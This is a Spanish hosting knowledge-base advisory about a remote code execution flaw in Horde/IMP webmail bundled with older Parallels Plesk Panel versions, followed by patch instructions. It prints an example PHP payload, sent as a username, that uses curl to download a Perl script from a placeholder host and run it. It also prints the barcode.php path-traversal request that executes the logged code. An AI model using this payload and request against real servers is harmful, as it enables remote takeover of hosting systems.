Hosting Knowledge Base

Vulnerabilidad de seguridad en webmail Horde/IMP de Parallels Plesk Panel

Se ha encontrado una vulnerabilidad recientemente que afecta a las versiones de Horde/IMP (3.1.7-3.3.2) incluidas en Parallels Panel 8.x y versiones anteriores de 9.x (antes de la versión 9.5.4) que permite la ejecución de software malintencionado mediante el acceso al webmail a través de una petición POST al archivo /horde/imp/redirect.php que incluye código PHP como el nombre de usuario. Por ejemplo:

<?php passthru("cd /tmp;curl -O -s http://domain.tld/new.txt;perl new.txt;rm -rf new.txt"); ?>

Como resultado, el código PHP se registra en el archivo /var/log/psa-horde/psa-horde.log y, debido a una vulnerabilidad de seguridad en el archivo, barcode.php, los atacantes pueden hacer que Horde ejecute el código a través de esta petición:

/horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log

Para la resolución de este problema es necesario descargarse un parche realizado por Parallels al respecto dependiendo de la plataforma que empleemos ( Windows o Linux ) y situarlo en la carpeta correspondiente:

Linux:
/usr/share/psa-horde/lib/Horde/ - [ PARCHE ]

Windows:
%plesk_vhosts%\webmail\horde\lib\Horde\ - [ PARCHE ]

Simplemente hay que sustituir el archivo dentro del archivo zip ( Image.php ) por el ubicado en los directorios especificados.

Fuente: http://kb.parallels.com/es/113374

Archivos adjuntos

No se han encontrado archivos adjuntos.

¿Cómo puntuaría esta respuesta?



Para publicar un comentario para este artículo, simplemente complete el formulario más abajo. Los campos marcados con un asterisco son obligatorios.


Comentarios de los visitantes

No hay comentarios publicados de visitantes. Publicar un comentario
  • SILICONTOWER, S.L.
  • ESB64611825
  • Rda.General Mitre 25 Bajos 2a
  • 08017 Barcelona